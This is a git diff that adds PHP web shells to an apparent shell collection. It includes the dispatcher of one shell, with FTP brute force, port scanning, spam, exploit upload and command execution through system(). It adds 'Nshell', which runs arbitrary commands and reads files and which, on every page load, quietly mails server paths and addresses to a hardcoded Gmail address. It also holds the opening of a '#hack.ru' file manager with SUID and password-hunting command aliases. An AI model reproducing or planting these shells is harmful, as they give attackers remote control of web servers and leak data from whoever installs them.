+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
diff --git a/138shell/N/Nshell (1).php.txt b/138shell/N/Nshell (1).php.txt
new file mode 100644
index 0000000..1d008b6
--- /dev/null
+++ b/138shell/N/Nshell (1).php.txt	
@@ -0,0 +1,66 @@
+<?php
+//code by navaro :d
+/***************************************/
+  closelog( );
+/*
+  echo "<center>";
+  $user = get_current_user( ); echo "User :".$user."<br>";
+  $login = posix_getuid( ); echo "Login (Get uid):".$login."<br>";
+  $euid = posix_geteuid( ); echo "Get Euid (geteuid):".$euid."<br>";
+  $ver = phpversion( ); echo "Php version (phpversion) :".$ver."<br>";
+  $gid = posix_getgid( ); echo "Get id (id) :".$gid."<br>";
+  if ($chdir == "") $chdir = getcwd( ); echo "pwd :".$chdir."<br>";
+  if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
+  echo "</center>";
+
+/***************************************/
+function readfiles()
+{
+echo "<form name=pathfile method=post action=".$_SERVER['REQUEST_URI'].">";
+echo "File name : <br><input size=50 name=file type=text".@$_POST['file']."><br>";
+echo "<input type=submit value=Submit></form><hr color=777777 width=100% height=115px>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
+$file=@$_POST['file'];
+if(!@fopen("$file","r")) { echo "File not found";exit();};
+if(@isset($file))
+{
+$fd = @fopen ("$file", "r");
+echo "<center><font face=\"tahoma\" size=\"12\"><TEXTAREA NAME=\"source\" ROWS=\"35\" COLS=\"120\">";
+while (!@feof ($fd)) {
+   $buffer = @fgets($fd);
+   echo htmlspecialchars($buffer);
+}
+@fclose ($fd);
+echo "</TEXTAREA> </font></center>";
+}
+else echo $_SERVER['PHP_SELF']."?file=";
+}
+// Thuc thi command
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function ecmd()
+{
+echo "<FORM name=injection METHOD=POST ACTION=".$_SERVER['REQUEST_URI'].">";
+echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($_POST['cmd']))."><br> <INPUT TYPE=submit></FORM><hr color=777777 width=100% height=115px></font><pre>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+$cmd = @$_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit();
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+echo "</pre>";
+}
+$act=@$_REQUEST['act'];
+if(empty($act))
+{ echo $_SERVER['PHP_SELF']."act=?<br>" ;
+echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+; exit();
+}
+if($act=="cmd") {ecmd();}
+if($act=="readfile") {readfiles();}
+?>
+ 
diff --git a/138shell/N/network.php.txt b/138shell/N/network.php.txt
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/138shell/N/network.php.txt
@@ -0,0 +1,5603 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="effes2004@gmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel #hack.ru";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* port scanner */
+
+$min="1";
+
+$max="65535";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ports and services names */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+$port[19] = "character generator";
+
+$port[20] = "ftp-data";
+
+$port[21] = "ftp";
+
+$port[22] = "ssh, pcAnywhere";
+
+$port[23] = "Telnet";
+
+$port[25] = "SMTP (Simple Mail Transfer)";
+
+$port[27] = "ETRN (NSW User System FE)";
+
+$port[29] = "MSG ICP";
+
+$port[31] = "MSG Authentication";
+
+$port[33] = "dsp (Display Support Protocol)";
+
+$port[37] = "time";
+
+$port[38] = "RAP (Route Access Protocol)";
+
+$port[39] = "rlp (Resource Location Protocol)";
+
+$port[41] = "Graphics";
+
+$port[42] = "nameserv, WINS";
+
+$port[43] = "whois, nickname";
+
+$port[44] = "MPM FLAGS Protocol";
+
+$port[45] = "Message Processing Module [recv]";
+
+$port[46] = "MPM [default send]";
+
+$port[47] = "NI FTP";
+
+$port[48] = "Digital Audit Daemon";
+
+$port[49] = "TACACS, Login Host Protocol";
+
+$port[50] = "RMCP, re-mail-ck";
+
+$port[53] = "DNS";
+
+$port[57] = "MTP (any private terminal access)";
+
+$port[59] = "NFILE";
+
+$port[60] = "Unassigned";
+
+$port[61] = "NI MAIL";
+
+$port[62] = "ACA Services";
+
+$port[63] = "whois++";
+
+$port[64] = "Communications Integrator (CI)";
+
+$port[65] = "TACACS-Database Service";
+
+$port[66] = "Oracle SQL*NET";
+
+$port[67] = "bootps (Bootstrap Protocol Server)";
+
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+
+$port[70] = "Gopher";
+
+$port[71] = "Remote Job Service";
+
+$port[72] = "Remote Job Service";
+
+$port[73] = "Remote Job Service";
+
+$port[74] = "Remote Job Service";
+
+$port[75] = "any private dial out service";
+
+$port[76] = "Distributed External Object Store";
+
+$port[77] = "any private RJE service";
+
+$port[78] = "vettcp";
+
+$port[79] = "finger";
+
+$port[80] = "World Wide Web HTTP";
+
+$port[81] = "HOSTS2 Name Serve";
+
+$port[82] = "XFER Utility";
+
+$port[83] = "MIT ML Device";
+
+$port[84] = "Common Trace Facility";
+
+$port[85] = "MIT ML Device";
+
+$port[86] = "Micro Focus Cobol";
+
+$port[87] = "any private terminal link";
+
+$port[88] = "Kerberos, WWW";
+
+$port[89] = "SU/MIT Telnet Gateway";
+
+$port[90] = "DNSIX Securit Attribute Token Map";
+
+$port[91] = "MIT Dover Spooler";
+
+$port[92] = "Network Printing Protocol";
+
+$port[93] = "Device Control Protocol";
+
+$port[94] = "Tivoli Object Dispatcher";
+
+$port[95] = "supdup";
+
+$port[96] = "DIXIE";
+
+$port[98] = "linuxconf";
+
+$port[99] = "Metagram Relay";
+
+$port[100] = "[unauthorized use]";
+
+$port[101] = "HOSTNAME";
+
+$port[102] = "ISO, X.400, ITOT";
+
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+
+$port[105] = "CCSO name server protocol";
+
+$port[106] = "poppassd";
+
+$port[107] = "Remote Telnet Service";
+
+$port[108] = "SNA Gateway Access Server";
+
+$port[109] = "POP2";
+
+$port[110] = "POP3";
+
+$port[111] = "Sun RPC Portmapper";
+
+$port[112] = "McIDAS Data Transmission Protocol";
+
+$port[113] = "Authentication Service";
+
+$port[115] = "sftp (Simple File Transfer Protocol)";
+
+$port[116] = "ANSA REX Notify";
+
+$port[117] = "UUCP Path Service";
+
+$port[118] = "SQL Services";
+
+$port[119] = "NNTP";
+
+$port[120] = "CFDP";
+
+$port[123] = "NTP";
+
+$port[124] = "SecureID";
+
+$port[129] = "PWDGEN";
+
+$port[133] = "statsrv";
+
+$port[135] = "loc-srv/epmap";
+
+$port[137] = "netbios-ns";
+
+$port[138] = "netbios-dgm (UDP)";
+
+$port[139] = "NetBIOS";
+
+$port[143] = "IMAP";
+
+$port[144] = "NewS";
+
+$port[150] = "SQL-NET";
+
+$port[152] = "BFTP";
+
+$port[153] = "SGMP";
+
+$port[156] = "SQL Service";
+
+$port[161] = "SNMP";
+
+$port[175] = "vmnet";
+
+$port[177] = "XDMCP";
+
+$port[178] = "NextStep Window Server";
+
+$port[179] = "BGP";
+
+$port[180] = "SLmail admin";
+
+$port[199] = "smux";
+
+$port[210] = "Z39.50";
+
+$port[213] = "IPX";
+
+$port[218] = "MPP";
+
+$port[220] = "IMAP3";
+
+$port[256] = "RAP";
+
+$port[257] = "Secure Electronic Transaction";
+
+$port[258] = "Yak Winsock Personal Chat";
+
+$port[259] = "ESRO";
+
+$port[264] = "FW1_topo";
+
+$port[311] = "Apple WebAdmin";
+
+$port[350] = "MATIP type A";
+
+$port[351] = "MATIP type B";
+
+$port[363] = "RSVP tunnel";
+
+$port[366] = "ODMR (On-Demand Mail Relay)";
+
+$port[371] = "Clearcase";
+
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+
+$port[389] = "LDAP";
+
+$port[407] = "Timbuktu";
+
+$port[427] = "Server Location";
+
+$port[434] = "Mobile IP";
+
+$port[443] = "ssl";
+
+$port[444] = "snpp, Simple Network Paging Protocol";
+
+$port[445] = "SMB";
+
+$port[458] = "QuickTime TV/Conferencing";
+
+$port[468] = "Photuris";
+
+$port[475] = "tcpnethaspsrv";
+
+$port[500] = "ISAKMP, pluto";
+
+$port[511] = "mynet-as";
+
+$port[512] = "biff, rexec";
+
+$port[513] = "who, rlogin";
+
+$port[514] = "syslog, rsh";
+
+$port[515] = "lp, lpr, line printer";
+
+$port[517] = "talk";
+
+$port[520] = "RIP (Routing Information Protocol)";
+
+$port[521] = "RIPng";
+
+$port[522] = "ULS";
+
+$port[531] = "IRC";
+
+$port[543] = "KLogin, AppleShare over IP";
+
+$port[545] = "QuickTime";
+
+$port[548] = "AFP";
+
+$port[554] = "Real Time Streaming Protocol";
+
+$port[555] = "phAse Zero";
+
+$port[563] = "NNTP over SSL";
+
+$port[575] = "VEMMI";
+
+$port[581] = "Bundle Discovery Protocol";
+
+$port[593] = "MS-RPC";
+
+$port[608] = "SIFT/UFT";
+
+$port[626] = "Apple ASIA";
+
+$port[631] = "IPP (Internet Printing Protocol)";
+
+$port[635] = "RLZ DBase";
+
+$port[636] = "sldap";
+
+$port[642] = "EMSD";
+
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+
+$port[655] = "tinc";
+
+$port[660] = "Apple MacOS Server Admin";
+
+$port[666] = "Doom";
+
+$port[674] = "ACAP";
+
+$port[687] = "AppleShare IP Registry";
+
+$port[700] = "buddyphone";
+
+$port[705] = "AgentX for SNMP";
+
+$port[901] = "swat, realsecure";
+
+$port[993] = "s-imap";
+
+$port[995] = "s-pop";
+
+$port[1024] = "Reserved";
+
+$port[1025] = "network blackjack";
+
+$port[1062] = "Veracity";
+
+$port[1080] = "SOCKS";
+
+$port[1085] = "WebObjects";
+
+$port[1227] = "DNS2Go";
+
+$port[1243] = "SubSeven";
+
+$port[1338] = "Millennium Worm";
+
+$port[1352] = "Lotus Notes";
+
+$port[1381] = "Apple Network License Manager";
+
+$port[1417] = "Timbuktu Service 1 Port";
+
+$port[1418] = "Timbuktu Service 2 Port";
+
+$port[1419] = "Timbuktu Service 3 Port";
+
+$port[1420] = "Timbuktu Service 4 Port";
+
+$port[1433] = "Microsoft SQL Server";
+
+$port[1434] = "Microsoft SQL Monitor";
+
+$port[1477] = "ms-sna-server";
+
+$port[1478] = "ms-sna-base";
+
+$port[1490] = "insitu-conf";
+
+$port[1494] = "Citrix ICA Protocol";
+
+$port[1498] = "Watcom-SQL";
+
+$port[1500] = "VLSI License Manager";
+
+$port[1503] = "T.120";
+
+$port[1521] = "Oracle SQL";
+
+$port[1522] = "Ricardo North America License Manager";
+
+$port[1524] = "ingres";
+
+$port[1525] = "prospero";
+
+$port[1526] = "prospero";
+
+$port[1527] = "tlisrv";
+
+$port[1529] = "oracle";
+
+$port[1547] = "laplink";
+
+$port[1604] = "Citrix ICA, MS Terminal Server";
+
+$port[1645] = "RADIUS Authentication";
+
+$port[1646] = "RADIUS Accounting";
+
+$port[1680] = "Carbon Copy";
+
+$port[1701] = "L2TP/LSF";
+
+$port[1717] = "Convoy";
+
+$port[1720] = "H.323/Q.931";
+
+$port[1723] = "PPTP control port";
+
+$port[1731] = "MSICCP";
+
+$port[1755] = "Windows Media .asf";
+
+$port[1758] = "TFTP multicast";
+
+$port[1761] = "cft-0";
+
+$port[1762] = "cft-1";
+
+$port[1763] = "cft-2";
+
+$port[1764] = "cft-3";
+
+$port[1765] = "cft-4";
+
+$port[1766] = "cft-5";
+
+$port[1767] = "cft-6";
+
+$port[1808] = "Oracle-VP2";
+
+$port[1812] = "RADIUS server";
+
+$port[1813] = "RADIUS accounting";
+
+$port[1818] = "ETFTP";
+
+$port[1973] = "DLSw DCAP/DRAP";
+
+$port[1985] = "HSRP";
+
+$port[1999] = "Cisco AUTH";
+
+$port[2001] = "glimpse";
+
+$port[2049] = "NFS";
+
+$port[2064] = "distributed.net";
+
+$port[2065] = "DLSw";
+
+$port[2066] = "DLSw";
+
+$port[2106] = "MZAP";
+
+$port[2140] = "DeepThroat";
+
+$port[2301] = "Compaq Insight Management Web Agents";
+
+$port[2327] = "Netscape Conference";
+
+$port[2336] = "Apple UG Control";
+
+$port[2427] = "MGCP gateway";
+
+$port[2504] = "WLBS";
+
+$port[2535] = "MADCAP";
+
+$port[2543] = "sip";
+
+$port[2592] = "netrek";
+
+$port[2727] = "MGCP call agent";
+
+$port[2628] = "DICT";
+
+$port[2998] = "ISS Real Secure Console Service Port";
+
+$port[3000] = "Firstclass";
+
+$port[3001] = "Redwood Broker";
+
+$port[3031] = "Apple AgentVU";
+
+$port[3128] = "squid";
+
+$port[3130] = "ICP";
+
+$port[3150] = "DeepThroat";
+
+$port[3264] = "ccmail";
+
+$port[3283] = "Apple NetAssitant";
+
+$port[3288] = "COPS";
+
+$port[3305] = "ODETTE";
+
+$port[3306] = "mySQL";
+
+$port[3389] = "RDP Protocol (Terminal Server)";
+
+$port[3521] = "netrek";
+
+$port[4000] = "icq, command-n-conquer and shell nfm";
+
+$port[4321] = "rwhois";
+
+$port[4333] = "mSQL";
+
+$port[4444] = "KRB524";
+
+$port[4827] = "HTCP";
+
+$port[5002] = "radio free ethernet";
+
+$port[5004] = "RTP";
+
+$port[5005] = "RTP";
+
+$port[5010] = "Yahoo! Messenger";
+
+$port[5050] = "multimedia conference control tool";
+
+$port[5060] = "SIP";
+
+$port[5150] = "Ascend Tunnel Management Protocol";
+
+$port[5190] = "AIM";
+
+$port[5500] = "securid";
+
+$port[5501] = "securidprop";
+
+$port[5423] = "Apple VirtualUser";
+
+$port[5555] = "Personal Agent";
+
+$port[5631] = "PCAnywhere data";
+
+$port[5632] = "PCAnywhere";
+
+$port[5678] = "Remote Replication Agent Connection";
+
+$port[5800] = "VNC";
+
+$port[5801] = "VNC";
+
+$port[5900] = "VNC";
+
+$port[5901] = "VNC";
+
+$port[6000] = "X Windows";
+
+$port[6112] = "BattleNet";
+
+$port[6502] = "Netscape Conference";
+
+$port[6667] = "IRC";
+
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+
+$port[6699] = "napster";
+
+$port[6776] = "Sub7";
+
+$port[6970] = "RTP";
+
+$port[7007] = "MSBD, Windows Media encoder";
+
+$port[7070] = "RealServer/QuickTime";
+
+$port[7777] = "cbt";
+
+$port[7778] = "Unreal";
+
+$port[7648] = "CU-SeeMe";
+
+$port[7649] = "CU-SeeMe";
+
+$port[8000] = "iRDMI/Shoutcast Server";
+
+$port[8010] = "WinGate 2.1";
+
+$port[8080] = "HTTP";
+
+$port[8181] = "HTTP";
+
+$port[8383] = "IMail WWW";
+
+$port[8875] = "napster";
+
+$port[8888] = "napster";
+
+$port[8889] = "Desktop Data TCP 1";
+
+$port[8890] = "Desktop Data TCP 2";
+
+$port[8891] = "Desktop Data TCP 3: NESS application";
+
+$port[8892] = "Desktop Data TCP 4: FARM product";
+
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+
+$port[8894] = "Desktop Data TCP 6: COAL application";
+
+$port[9000] = "CSlistener";
+
+$port[10008] = "cheese worm";
+
+$port[11371] = "PGP 5 Keyserver";
+
+$port[13223] = "PowWow";
+
+$port[13224] = "PowWow";
+
+$port[14237] = "Palm";
+
+$port[14238] = "Palm";
+
+$port[18888] = "LiquidAudio";
+
+$port[21157] = "Activision";
+
+$port[22555] = "Vocaltec Web Conference";
+
+$port[23213] = "PowWow";
+
+$port[23214] = "PowWow";
+
+$port[23456] = "EvilFTP";
+
+$port[26000] = "Quake";
+
+$port[27001] = "QuakeWorld";
+
+$port[27010] = "Half-Life";
+
+$port[27015] = "Half-Life";
+
+$port[27960] = "QuakeIII";
+
+$port[30029] = "AOL Admin";
+
+$port[31337] = "Back Orifice";
+
+$port[32777] = "rpc.walld";
+
+$port[45000] = "Cisco NetRanger postofficed";
+
+$port[32773] = "rpc bserverd";
+
+$port[32776] = "rpc.spray";
+
+$port[32779] = "rpc.cmsd";
+
+$port[38036] = "timestep";
+
+$port[40193] = "Novell";
+
+$port[41524] = "arcserve discovery";
+
+
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
